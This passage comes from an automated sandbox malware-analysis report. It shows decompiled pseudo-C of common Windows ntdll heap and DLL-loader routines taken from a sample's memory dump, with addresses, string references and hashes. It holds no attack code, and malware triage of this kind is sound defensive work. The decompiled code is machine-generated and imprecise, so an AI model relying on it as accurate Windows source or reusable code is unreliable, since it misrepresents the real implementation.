                                                    0x017c87ae
                                                    0x017c87b4
                                                    0x017c87b5
                                                    0x017c87b6
                                                    0x017c87b8
                                                    0x017c87bd
                                                    0x017c87c1
                                                    0x017c87f4
                                                    0x017c87fa
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x017c87c1
                                                    0x00000000

                                                    Strings
                                                    • LdrpDoPostSnapWork, xrefs: 01819C1E
                                                    • LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x, xrefs: 01819C18
                                                    • minkernel\ntdll\ldrsnap.c, xrefs: 01819C28
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID: InitializeThunk
                                                    • String ID: LdrpDoPostSnapWork$LdrpDoPostSnapWork:Unable to unsuppress the export suppressed functions that are imported in the DLL based at 0x%p.Status = 0x%x$minkernel\ntdll\ldrsnap.c
                                                    • API String ID: 2994545307-1948996284
                                                    • Opcode ID: 67d8f0050148db335afcd89483e926783e6318abc357f5a835ce1512b80e29b7
                                                    • Instruction ID: 117da58df9a9ad3474dad248b5936f2e5eb33eb4a1a60fe0d9fd425cbf693348
                                                    • Opcode Fuzzy Hash: 67d8f0050148db335afcd89483e926783e6318abc357f5a835ce1512b80e29b7
                                                    • Instruction Fuzzy Hash: 7A911371A002069BEF18DF59D880ABAF7F5FF44B14B45406DEA05AB645EB30EA41CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017EAC7B Relevance: 4.0, Strings: 3, Instructions: 205COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 80%
                                                    			E017EAC7B(void* __ecx, signed short* __edx) {
				signed int _v8;
				signed int _v12;
				void* __ebx;
				signed char _t75;
				signed int _t79;
				signed int _t88;
				intOrPtr _t89;
				signed int _t96;
				signed char* _t97;
				intOrPtr _t98;
				signed int _t101;
				signed char* _t102;
				intOrPtr _t103;
				signed int _t105;
				signed char* _t106;
				signed int _t131;
				signed int _t138;
				void* _t149;
				signed short* _t150;

				_t150 = __edx;
				_t149 = __ecx;
				_t70 =  *__edx & 0x0000ffff;
				__edx[1] = __edx[1] & 0x000000f8;
				__edx[3] = 0;
				_v8 =  *__edx & 0x0000ffff;
				if(( *(__ecx + 0x40) & 0x00000040) != 0) {
					_t39 =  &(_t150[8]); // 0x8
					E0180D5E0(_t39, _t70 * 8 - 0x10, 0xfeeefeee);
					__edx[1] = __edx[1] | 0x00000004;
				}
				_t75 =  *(_t149 + 0xcc) ^  *0x18a8a68;
				if(_t75 != 0) {
					L4:
					if( *((intOrPtr*)(_t149 + 0x4c)) != 0) {
						_t150[1] = _t150[0] ^ _t150[1] ^  *_t150;
						_t79 =  *(_t149 + 0x50);
						 *_t150 =  *_t150 ^ _t79;
						return _t79;
					}
					return _t75;
				} else {
					_t9 =  &(_t150[0x80f]); // 0x1017
					_t138 = _t9 & 0xfffff000;
					_t10 =  &(_t150[0x14]); // 0x20
					_v12 = _t138;
					if(_t138 == _t10) {
						_t138 = _t138 + 0x1000;
						_v12 = _t138;
					}
					_t75 = _t150 + (( *_t150 & 0x0000ffff) + 0xfffffffe) * 0x00000008 & 0xfffff000;
					if(_t75 > _t138) {
						_v8 = _t75 - _t138;
						_push(0x4000);
						_push( &_v8);
						_push( &_v12);
						_push(0xffffffff);
						_t131 = E017F96E0();
						__eflags = _t131 - 0xc0000045;
						if(_t131 == 0xc0000045) {
							_t88 = E01863C60(_v12, _v8);
							__eflags = _t88;
							if(_t88 != 0) {
								_push(0x4000);
								_push( &_v8);
								_push( &_v12);
								_push(0xffffffff);
								_t131 = E017F96E0();
							}
						}
						_t89 =  *[fs:0x30];
						__eflags = _t131;
						if(_t131 < 0) {
							__eflags =  *(_t89 + 0xc);
							if( *(_t89 + 0xc) == 0) {
								_push("HEAP: ");
								E017BB150();
							} else {
								E017BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
							}
							_push(_v8);
							_push(_v12);
							_push(_t149);
							_t75 = E017BB150("RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)\n", _t131);
							goto L4;
						} else {
							_t96 =  *(_t89 + 0x50);
							_t132 = 0x7ffe0380;
							__eflags = _t96;
							if(_t96 != 0) {
								__eflags =  *_t96;
								if( *_t96 == 0) {
									goto L10;
								}
								_t97 =  *( *[fs:0x30] + 0x50) + 0x226;
								L11:
								__eflags =  *_t97;
								if( *_t97 != 0) {
									_t98 =  *[fs:0x30];
									__eflags =  *(_t98 + 0x240) & 0x00000001;
									if(( *(_t98 + 0x240) & 0x00000001) != 0) {
										E018714FB(_t132, _t149, _v12, _v8, 7);
									}
								}
								 *((intOrPtr*)(_t149 + 0x234)) =  *((intOrPtr*)(_t149 + 0x234)) + _v8;
								 *((intOrPtr*)(_t149 + 0x210)) =  *((intOrPtr*)(_t149 + 0x210)) + 1;
								 *((intOrPtr*)(_t149 + 0x230)) =  *((intOrPtr*)(_t149 + 0x230)) + 1;
								 *((intOrPtr*)(_t149 + 0x220)) =  *((intOrPtr*)(_t149 + 0x220)) + 1;
								_t101 =  *( *[fs:0x30] + 0x50);
								__eflags = _t101;
								if(_t101 != 0) {
									__eflags =  *_t101;
									if( *_t101 == 0) {
										goto L13;
									}
									_t102 =  *( *[fs:0x30] + 0x50) + 0x226;
									goto L14;
								} else {
									L13:
									_t102 = _t132;
									L14:
									__eflags =  *_t102;
									if( *_t102 != 0) {
										_t103 =  *[fs:0x30];
										__eflags =  *(_t103 + 0x240) & 0x00000001;
										if(( *(_t103 + 0x240) & 0x00000001) != 0) {
											__eflags = E017D7D50();
											if(__eflags != 0) {
												_t132 =  *( *[fs:0x30] + 0x50) + 0x226;
												__eflags =  *( *[fs:0x30] + 0x50) + 0x226;
											}
											E01871411(_t132, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t132 & 0x000000ff);
										}
									}
									_t133 = 0x7ffe038a;
									_t105 =  *( *[fs:0x30] + 0x50);
									__eflags = _t105;
									if(_t105 != 0) {
										__eflags =  *_t105;
										if( *_t105 == 0) {
											goto L16;
										}
										_t106 =  *( *[fs:0x30] + 0x50) + 0x230;
										goto L17;
									} else {
										L16:
										_t106 = _t133;
										L17:
										__eflags =  *_t106;
										if( *_t106 != 0) {
											__eflags = E017D7D50();
											if(__eflags != 0) {
												_t133 =  *( *[fs:0x30] + 0x50) + 0x230;
												__eflags =  *( *[fs:0x30] + 0x50) + 0x230;
											}
											E01871411(_t133, _t149, _v12, __eflags, _v8,  *(_t149 + 0x74) << 3, 0, 0,  *_t133 & 0x000000ff);
										}
										_t75 = _t150[1] & 0x00000013 | 0x00000008;
										_t150[1] = _t75;
										goto L4;
									}
								}
							}
							L10:
							_t97 = _t132;
							goto L11;
						}
					} else {
						goto L4;
					}
				}
			}






















                                                    0x017eac85
                                                    0x017eac88
                                                    0x017eac8a
                                                    0x017eac8d
                                                    0x017eac91
                                                    0x017eac99
                                                    0x017eac9c
                                                    0x01829f57
                                                    0x01829f5b
                                                    0x01829f60
                                                    0x01829f60
                                                    0x017eaca8
                                                    0x017eacae
                                                    0x017eacda
                                                    0x017eacde
                                                    0x017eace8
                                                    0x017eaceb
                                                    0x017eacee
                                                    0x00000000
                                                    0x017eacee
                                                    0x017eacf6
                                                    0x017eacb0
                                                    0x017eacb0
                                                    0x017eacbb
                                                    0x017eacbd
                                                    0x017eacc0
                                                    0x017eacc5
                                                    0x017eadae
                                                    0x017eadb4
                                                    0x017eadb4
                                                    0x017eacd4
                                                    0x017eacd8
                                                    0x017eacf9
                                                    0x017eacff
                                                    0x017ead04
                                                    0x017ead08
                                                    0x017ead09
                                                    0x017ead10
                                                    0x017ead12
                                                    0x017ead18
                                                    0x01829f6f
                                                    0x01829f74
                                                    0x01829f76
                                                    0x01829f7c
                                                    0x01829f84
                                                    0x01829f88
                                                    0x01829f89
                                                    0x01829f90
                                                    0x01829f90
                                                    0x01829f76
                                                    0x017ead1e
                                                    0x017ead24
                                                    0x017ead26
                                                    0x0182a097
                                                    0x0182a09b
                                                    0x0182a0ba
                                                    0x0182a0bf
                                                    0x0182a09d
                                                    0x0182a0b2
                                                    0x0182a0b7
                                                    0x0182a0c5
                                                    0x0182a0c8
                                                    0x0182a0cb
                                                    0x0182a0d2
                                                    0x00000000
                                                    0x017ead2c
                                                    0x017ead2c
                                                    0x017ead2f
                                                    0x017ead34
                                                    0x017ead36
                                                    0x01829f97
                                                    0x01829f9a
                                                    0x00000000
                                                    0x00000000
                                                    0x01829fa9
                                                    0x017ead3e
                                                    0x017ead3e
                                                    0x017ead41
                                                    0x01829fb3
                                                    0x01829fb9
                                                    0x01829fc0
                                                    0x01829fd0
                                                    0x01829fd0
                                                    0x01829fc0
                                                    0x017ead4a
                                                    0x017ead50
                                                    0x017ead5c
                                                    0x017ead62
                                                    0x017ead68
                                                    0x017ead6b
                                                    0x017ead6d
                                                    0x01829fda
                                                    0x01829fdd
                                                    0x00000000
                                                    0x00000000
                                                    0x01829fec
                                                    0x00000000
                                                    0x017ead73
                                                    0x017ead73
                                                    0x017ead73
                                                    0x017ead75
                                                    0x017ead75
                                                    0x017ead78
                                                    0x01829ff6
                                                    0x01829ffc
                                                    0x0182a003
                                                    0x0182a00e
                                                    0x0182a010
                                                    0x0182a01b
                                                    0x0182a01b
                                                    0x0182a01b
                                                    0x0182a038
                                                    0x0182a038
                                                    0x0182a003
                                                    0x017ead84
                                                    0x017ead89
                                                    0x017ead8c
                                                    0x017ead8e
                                                    0x0182a042
                                                    0x0182a045
                                                    0x00000000
                                                    0x00000000
                                                    0x0182a054
                                                    0x00000000
                                                    0x017ead94
                                                    0x017ead94
                                                    0x017ead94
                                                    0x017ead96
                                                    0x017ead96
                                                    0x017ead99
                                                    0x0182a063
                                                    0x0182a065
                                                    0x0182a070
                                                    0x0182a070
                                                    0x0182a070
                                                    0x0182a08d
                                                    0x0182a08d
                                                    0x017eada4
                                                    0x017eada6
                                                    0x00000000
                                                    0x017eada6
                                                    0x017ead8e
                                                    0x017ead6d
                                                    0x017ead3c
                                                    0x017ead3c
                                                    0x00000000
                                                    0x017ead3c
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x017eacd8

                                                    Strings
                                                    • HEAP[%wZ]: , xrefs: 0182A0AD
                                                    • HEAP: , xrefs: 0182A0BA
                                                    • RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix), xrefs: 0182A0CD
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: HEAP: $HEAP[%wZ]: $RtlpHeapFreeVirtualMemory failed %lx for heap %p (base %p, size %Ix)
                                                    • API String ID: 0-1340214556
                                                    • Opcode ID: cf35e8bc3a344981b63fce15c2a8405015537c2082c24f4f682da47851c89da2
                                                    • Instruction ID: ffa6b016dbddbcd39f6c6c518be7c560567a34e71fc312125d61855f831b2e36
                                                    • Opcode Fuzzy Hash: cf35e8bc3a344981b63fce15c2a8405015537c2082c24f4f682da47851c89da2
                                                    • Instruction Fuzzy Hash: 0A81C031600694EFE726CBACC898BA9FBF8EF09714F0445A5E551C7692D779EA80CB10
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017DB73D Relevance: 3.9, Strings: 3, Instructions: 190COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 74%
                                                    			E017DB73D(void* __ecx, signed int __edx, intOrPtr* _a4, unsigned int _a8, intOrPtr _a12, signed int* _a16) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t72;
				char _t76;
				signed char _t77;
				intOrPtr* _t80;
				unsigned int _t85;
				signed int* _t86;
				signed int _t88;
				signed char _t89;
				intOrPtr _t90;
				intOrPtr _t101;
				intOrPtr* _t111;
				void* _t117;
				intOrPtr* _t118;
				signed int _t120;
				signed char _t121;
				intOrPtr* _t123;
				signed int _t126;
				intOrPtr _t136;
				signed int _t139;
				void* _t140;
				signed int _t141;
				void* _t147;

				_t111 = _a4;
				_t140 = __ecx;
				_v8 = __edx;
				_t3 = _t111 + 0x18; // 0x0
				 *((intOrPtr*)(_t111 + 0x10)) = _t3;
				_t5 = _t111 - 8; // -32
				_t141 = _t5;
				 *(_t111 + 0x14) = _a8;
				_t72 = 4;
				 *(_t141 + 2) = 1;
				 *_t141 = _t72;
				 *((char*)(_t141 + 7)) = 3;
				_t134 =  *((intOrPtr*)(__edx + 0x18));
				if( *((intOrPtr*)(__edx + 0x18)) != __edx) {
					_t76 = (_t141 - __edx >> 0x10) + 1;
					_v12 = _t76;
					__eflags = _t76 - 0xfe;
					if(_t76 >= 0xfe) {
						_push(__edx);
						_push(0);
						E0187A80D(_t134, 3, _t141, __edx);
						_t76 = _v12;
					}
				} else {
					_t76 = 0;
				}
				 *((char*)(_t141 + 6)) = _t76;
				if( *0x18a8748 >= 1) {
					__eflags = _a12 - _t141;
					if(_a12 <= _t141) {
						goto L4;
					}
					_t101 =  *[fs:0x30];
					__eflags =  *(_t101 + 0xc);
					if( *(_t101 + 0xc) == 0) {
						_push("HEAP: ");
						E017BB150();
					} else {
						E017BB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push("((PHEAP_ENTRY)LastKnownEntry <= Entry)");
					E017BB150();
					__eflags =  *0x18a7bc8;
					if(__eflags == 0) {
						E01872073(_t111, 1, _t140, __eflags);
					}
					goto L3;
				} else {
					L3:
					_t147 = _a12 - _t141;
					L4:
					if(_t147 != 0) {
						 *((short*)(_t141 + 4)) =  *((intOrPtr*)(_t140 + 0x54));
					}
					if( *((intOrPtr*)(_t140 + 0x4c)) != 0) {
						 *(_t141 + 3) =  *(_t141 + 1) ^  *(_t141 + 2) ^  *_t141;
						 *_t141 =  *_t141 ^  *(_t140 + 0x50);
					}
					_t135 =  *(_t111 + 0x14);
					if( *(_t111 + 0x14) == 0) {
						L12:
						_t77 =  *((intOrPtr*)(_t141 + 6));
						if(_t77 != 0) {
							_t117 = (_t141 & 0xffff0000) - ((_t77 & 0x000000ff) << 0x10) + 0x10000;
						} else {
							_t117 = _t140;
						}
						_t118 = _t117 + 0x38;
						_t26 = _t111 + 8; // -16
						_t80 = _t26;
						_t136 =  *_t118;
						if( *((intOrPtr*)(_t136 + 4)) != _t118) {
							_push(_t118);
							_push(0);
							E0187A80D(0, 0xd, _t118,  *((intOrPtr*)(_t136 + 4)));
						} else {
							 *_t80 = _t136;
							 *((intOrPtr*)(_t80 + 4)) = _t118;
							 *((intOrPtr*)(_t136 + 4)) = _t80;
							 *_t118 = _t80;
						}
						_t120 = _v8;
						 *((intOrPtr*)(_t120 + 0x30)) =  *((intOrPtr*)(_t120 + 0x30)) + 1;
						 *((intOrPtr*)(_t120 + 0x2c)) =  *((intOrPtr*)(_t120 + 0x2c)) + ( *(_t111 + 0x14) >> 0xc);
						 *((intOrPtr*)(_t140 + 0x1e8)) =  *((intOrPtr*)(_t140 + 0x1e8)) -  *(_t111 + 0x14);
						 *((intOrPtr*)(_t140 + 0x1f8)) =  *((intOrPtr*)(_t140 + 0x1f8)) + 1;
						if( *((intOrPtr*)(_t140 + 0x1f8)) > 0xa) {
							__eflags =  *(_t140 + 0xb8);
							if( *(_t140 + 0xb8) == 0) {
								_t88 =  *(_t140 + 0x40) & 0x00000003;
								__eflags = _t88 - 2;
								_t121 = _t120 & 0xffffff00 | _t88 == 0x00000002;
								__eflags =  *0x18a8720 & 0x00000001;
								_t89 = _t88 & 0xffffff00 | ( *0x18a8720 & 0x00000001) == 0x00000000;
								__eflags = _t89 & _t121;
								if((_t89 & _t121) != 0) {
									 *(_t140 + 0x48) =  *(_t140 + 0x48) | 0x10000000;
								}
							}
						}
						_t85 =  *(_t111 + 0x14);
						if(_t85 >= 0x7f000) {
							 *((intOrPtr*)(_t140 + 0x1ec)) =  *((intOrPtr*)(_t140 + 0x1ec)) + _t85;
						}
						_t86 = _a16;
						 *_t86 = _t141 - _a12 >> 3;
						return _t86;
					} else {
						_t90 = E017DB8E4(_t135);
						_t123 =  *((intOrPtr*)(_t90 + 4));
						if( *_t123 != _t90) {
							_push(_t123);
							_push( *_t123);
							E0187A80D(0, 0xd, _t90, 0);
						} else {
							 *_t111 = _t90;
							 *((intOrPtr*)(_t111 + 4)) = _t123;
							 *_t123 = _t111;
							 *((intOrPtr*)(_t90 + 4)) = _t111;
						}
						_t139 =  *(_t140 + 0xb8);
						if(_t139 != 0) {
							_t93 =  *(_t111 + 0x14) >> 0xc;
							__eflags = _t93;
							while(1) {
								__eflags = _t93 -  *((intOrPtr*)(_t139 + 4));
								if(_t93 <  *((intOrPtr*)(_t139 + 4))) {
									break;
								}
								_t126 =  *_t139;
								__eflags = _t126;
								if(_t126 != 0) {
									_t139 = _t126;
									continue;
								}
								_t93 =  *((intOrPtr*)(_t139 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t139 + 4)) - 1;
								break;
							}
							E017DE4A0(_t140, _t139, 0, _t111, _t93,  *(_t111 + 0x14));
						}
						goto L12;
					}
				}
			}






























                                                    0x017db746
                                                    0x017db74b
                                                    0x017db74d
                                                    0x017db750
                                                    0x017db755
                                                    0x017db758
                                                    0x017db758
                                                    0x017db75e
                                                    0x017db763
                                                    0x017db764
                                                    0x017db76a
                                                    0x017db76d
                                                    0x017db771
                                                    0x017db776
                                                    0x017db85c
                                                    0x017db85d
                                                    0x017db860
                                                    0x017db865
                                                    0x01822ba1
                                                    0x01822ba2
                                                    0x01822ba9
                                                    0x01822bae
                                                    0x01822bae
                                                    0x017db77c
                                                    0x017db77c
                                                    0x017db77c
                                                    0x017db785
                                                    0x017db788
                                                    0x01822bb6
                                                    0x01822bb9
                                                    0x00000000
                                                    0x00000000
                                                    0x01822bbf
                                                    0x01822bc5
                                                    0x01822bc9
                                                    0x01822be8
                                                    0x01822bed
                                                    0x01822bcb
                                                    0x01822be0
                                                    0x01822be5
                                                    0x01822bf3
                                                    0x01822bf8
                                                    0x01822bfd
                                                    0x01822c05
                                                    0x01822c0e
                                                    0x01822c0e
                                                    0x00000000
                                                    0x017db78e
                                                    0x017db78e
                                                    0x017db78e
                                                    0x017db791
                                                    0x017db791
                                                    0x017db797
                                                    0x017db797
                                                    0x017db79f
                                                    0x017db7a9
                                                    0x017db7af
                                                    0x017db7af
                                                    0x017db7b1
                                                    0x017db7b6
                                                    0x017db7e2
                                                    0x017db7e2
                                                    0x017db7e7
                                                    0x017db880
                                                    0x017db7ed
                                                    0x017db7ed
                                                    0x017db7ed
                                                    0x017db7ef
                                                    0x017db7f2
                                                    0x017db7f2
                                                    0x017db7f5
                                                    0x017db7fa
                                                    0x01822c2d
                                                    0x01822c2e
                                                    0x01822c39
                                                    0x017db800
                                                    0x017db800
                                                    0x017db802
                                                    0x017db805
                                                    0x017db808
                                                    0x017db808
                                                    0x017db80a
                                                    0x017db80d
                                                    0x017db816
                                                    0x017db81c
                                                    0x017db822
                                                    0x017db82f
                                                    0x017db88b
                                                    0x017db892
                                                    0x017db897
                                                    0x017db899
                                                    0x017db89b
                                                    0x017db89e
                                                    0x017db8a5
                                                    0x017db8a8
                                                    0x017db8aa
                                                    0x017db8ac
                                                    0x017db8ac
                                                    0x017db8aa
                                                    0x017db892
                                                    0x017db831
                                                    0x017db839
                                                    0x017db83b
                                                    0x017db83b
                                                    0x017db844
                                                    0x017db84b
                                                    0x017db852
                                                    0x017db7b8
                                                    0x017db7ba
                                                    0x017db7bf
                                                    0x017db7c4
                                                    0x01822c18
                                                    0x01822c19
                                                    0x01822c23
                                                    0x017db7ca
                                                    0x017db7ca
                                                    0x017db7cc
                                                    0x017db7cf
                                                    0x017db7d1
                                                    0x017db7d1
                                                    0x017db7d4
                                                    0x017db7dc
                                                    0x017db8bb
                                                    0x017db8bb
                                                    0x017db8be
                                                    0x017db8be
                                                    0x017db8c1
                                                    0x00000000
                                                    0x00000000
                                                    0x017db8c3
                                                    0x017db8c5
                                                    0x017db8c7
                                                    0x017db8e0
                                                    0x00000000
                                                    0x017db8e0
                                                    0x017db8cc
                                                    0x017db8cc
                                                    0x00000000
                                                    0x017db8cc
                                                    0x017db8d6
                                                    0x017db8d6
                                                    0x00000000
                                                    0x017db7dc
                                                    0x017db7b6

                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                    • API String ID: 0-1334570610
                                                    • Opcode ID: de80b9fde2c357fedbaeafdd82d5f76801a8f0bb7fc14f9494d38720bffb7876
                                                    • Instruction ID: cc85bea3fb179fa4c1b917ab88c00d7512a2d2b6a3966c48b27fb08c171f4612
                                                    • Opcode Fuzzy Hash: de80b9fde2c357fedbaeafdd82d5f76801a8f0bb7fc14f9494d38720bffb7876
                                                    • Instruction Fuzzy Hash: D561AF70600249DFDB29CF28C485B6AFBF5FF46314F5A855EE8498B246D730E981CB91
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017C7E41 Relevance: 3.9, Strings: 3, Instructions: 174COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 98%
                                                    			E017C7E41(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				char _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v24;
				signed int _t73;
				void* _t77;
				char* _t82;
				char* _t87;
				signed char* _t97;
				signed char _t102;
				intOrPtr _t107;
				signed char* _t108;
				intOrPtr _t112;
				intOrPtr _t124;
				intOrPtr _t125;
				intOrPtr _t126;

				_t107 = __edx;
				_v12 = __ecx;
				_t125 =  *((intOrPtr*)(__ecx + 0x20));
				_t124 = 0;
				_v20 = __edx;
				if(E017CCEE4( *((intOrPtr*)(_t125 + 0x18)), 1, 0xe,  &_v24,  &_v8) >= 0) {
					_t112 = _v8;
				} else {
					_t112 = 0;
					_v8 = 0;
				}
				if(_t112 != 0) {
					if(( *(_v12 + 0x10) & 0x00800000) != 0) {
						_t124 = 0xc000007b;
						goto L8;
					}
					_t73 =  *(_t125 + 0x34) | 0x00400000;
					 *(_t125 + 0x34) = _t73;
					if(( *(_t112 + 0x10) & 0x00000001) == 0) {
						goto L3;
					}
					 *(_t125 + 0x34) = _t73 | 0x01000000;
					_t124 = E017BC9A4( *((intOrPtr*)(_t125 + 0x18)));
					if(_t124 < 0) {
						goto L8;
					} else {
						goto L3;
					}
				} else {
					L3:
					if(( *(_t107 + 0x16) & 0x00002000) == 0) {
						 *(_t125 + 0x34) =  *(_t125 + 0x34) & 0xfffffffb;
						L8:
						return _t124;
					}
					if(( *( *((intOrPtr*)(_t125 + 0x5c)) + 0x10) & 0x00000080) != 0) {
						if(( *(_t107 + 0x5e) & 0x00000080) != 0) {
							goto L5;
						}
						_t102 =  *0x18a5780; // 0x0
						if((_t102 & 0x00000003) != 0) {
							E01835510("minkernel\\ntdll\\ldrmap.c", 0x363, "LdrpCompleteMapModule", 0, "Could not validate the crypto signature for DLL %wZ\n", _t125 + 0x24);
							_t102 =  *0x18a5780; // 0x0
						}
						if((_t102 & 0x00000010) != 0) {
							asm("int3");
						}
						_t124 = 0xc0000428;
						goto L8;
					}
					L5:
					if(( *(_t125 + 0x34) & 0x01000000) != 0) {
						goto L8;
					}
					_t77 = _a4 - 0x40000003;
					if(_t77 == 0 || _t77 == 0x33) {
						_v16 =  *((intOrPtr*)(_t125 + 0x18));
						if(E017D7D50() != 0) {
							_t82 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
						} else {
							_t82 = 0x7ffe0384;
						}
						_t108 = 0x7ffe0385;
						if( *_t82 != 0) {
							if(( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E017D7D50() == 0) {
									_t97 = 0x7ffe0385;
								} else {
									_t97 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t97 & 0x00000020) != 0) {
									E01837016(0x1490, _v16, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
						}
						if(_a4 != 0x40000003) {
							L14:
							_t126 =  *((intOrPtr*)(_t125 + 0x18));
							if(E017D7D50() != 0) {
								_t87 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
							} else {
								_t87 = 0x7ffe0384;
							}
							if( *_t87 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000004) != 0) {
								if(E017D7D50() != 0) {
									_t108 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
								}
								if(( *_t108 & 0x00000020) != 0) {
									E01837016(0x1491, _t126, 0xffffffff, 0xffffffff, 0, 0);
								}
							}
							goto L8;
						} else {
							_v16 = _t125 + 0x24;
							_t124 = E017EA1C3( *((intOrPtr*)(_t125 + 0x18)),  *((intOrPtr*)(_v12 + 0x5c)), _v20, _t125 + 0x24);
							if(_t124 < 0) {
								E017BB1E1(_t124, 0x1490, 0, _v16);
								goto L8;
							}
							goto L14;
						}
					} else {
						goto L8;
					}
				}
			}




















                                                    0x017c7e4c
                                                    0x017c7e50
                                                    0x017c7e55
                                                    0x017c7e58
                                                    0x017c7e5d
                                                    0x017c7e71
                                                    0x017c7f33
                                                    0x017c7e77
                                                    0x017c7e77
                                                    0x017c7e79
                                                    0x017c7e79
                                                    0x017c7e7e
                                                    0x017c7f45
                                                    0x01819848
                                                    0x00000000
                                                    0x01819848
                                                    0x017c7f4e
                                                    0x017c7f53
                                                    0x017c7f5a
                                                    0x00000000
                                                    0x00000000
                                                    0x0181985a
                                                    0x01819862
                                                    0x01819866
                                                    0x00000000
                                                    0x0181986c
                                                    0x00000000
                                                    0x0181986c
                                                    0x017c7e84
                                                    0x017c7e84
                                                    0x017c7e8d
                                                    0x01819871
                                                    0x017c7eb8
                                                    0x017c7ec0
                                                    0x017c7ec0
                                                    0x017c7e9a
                                                    0x0181987e
                                                    0x00000000
                                                    0x00000000
                                                    0x01819884
                                                    0x0181988b
                                                    0x018198a7
                                                    0x018198ac
                                                    0x018198b1
                                                    0x018198b6
                                                    0x018198b8
                                                    0x018198b8
                                                    0x018198b9
                                                    0x00000000
                                                    0x018198b9
                                                    0x017c7ea0
                                                    0x017c7ea7
                                                    0x00000000
                                                    0x00000000
                                                    0x017c7eac
                                                    0x017c7eb1
                                                    0x017c7ec6
                                                    0x017c7ed0
                                                    0x018198cc
                                                    0x017c7ed6
                                                    0x017c7ed6
                                                    0x017c7ed6
                                                    0x017c7ede
                                                    0x017c7ee3
                                                    0x018198e3
                                                    0x018198f0
                                                    0x01819902
                                                    0x018198f2
                                                    0x018198fb
                                                    0x018198fb
                                                    0x01819907
                                                    0x0181991d
                                                    0x0181991d
                                                    0x01819907
                                                    0x018198e3
                                                    0x017c7ef0
                                                    0x017c7f14
                                                    0x017c7f14
                                                    0x017c7f1e
                                                    0x01819946
                                                    0x017c7f24
                                                    0x017c7f24
                                                    0x017c7f24
                                                    0x017c7f2c
                                                    0x0181996a
                                                    0x01819975
                                                    0x01819975
                                                    0x0181997e
                                                    0x01819993
                                                    0x01819993
                                                    0x0181997e
                                                    0x00000000
                                                    0x017c7ef2
                                                    0x017c7efc
                                                    0x017c7f0a
                                                    0x017c7f0e
                                                    0x01819933
                                                    0x00000000
                                                    0x01819933
                                                    0x00000000
                                                    0x017c7f0e
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x017c7eb1

                                                    Strings
                                                    • LdrpCompleteMapModule, xrefs: 01819898
                                                    • Could not validate the crypto signature for DLL %wZ, xrefs: 01819891
                                                    • minkernel\ntdll\ldrmap.c, xrefs: 018198A2
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.578840011.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_2_2_1790000_P5348574_74676.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: Could not validate the crypto signature for DLL %wZ$LdrpCompleteMapModule$minkernel\ntdll\ldrmap.c
                                                    • API String ID: 0-1676968949
                                                    • Opcode ID: 400d5d7eb3437389740a9cb8894d999b1beac20f28163ac0ec634ed076189495
                                                    • Instruction ID: 00cd56f7958c6ebc15b12a4ae2481f22e6476fcfe30a48ff9b0deef4f28dd3ef
                                                    • Opcode Fuzzy Hash: 400d5d7eb3437389740a9cb8894d999b1beac20f28163ac0ec634ed076189495
                                                    • Instruction Fuzzy Hash: DB51F332A007469BEB29CB5DC854B2AFBE4AB05B18F44069DED51DB3D5CB30EA40CF51
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 017BE620 Relevance: 3.9, Strings: 3, Instructions: 165COMMON
                                                    Download Yara Rule
                                                    C-Code - Quality: 93%
                                                    			E017BE620(void* __ecx, short* __edx, short* _a4) {
				char _v16;
				char _v20;
				intOrPtr _v24;
				char* _v28;
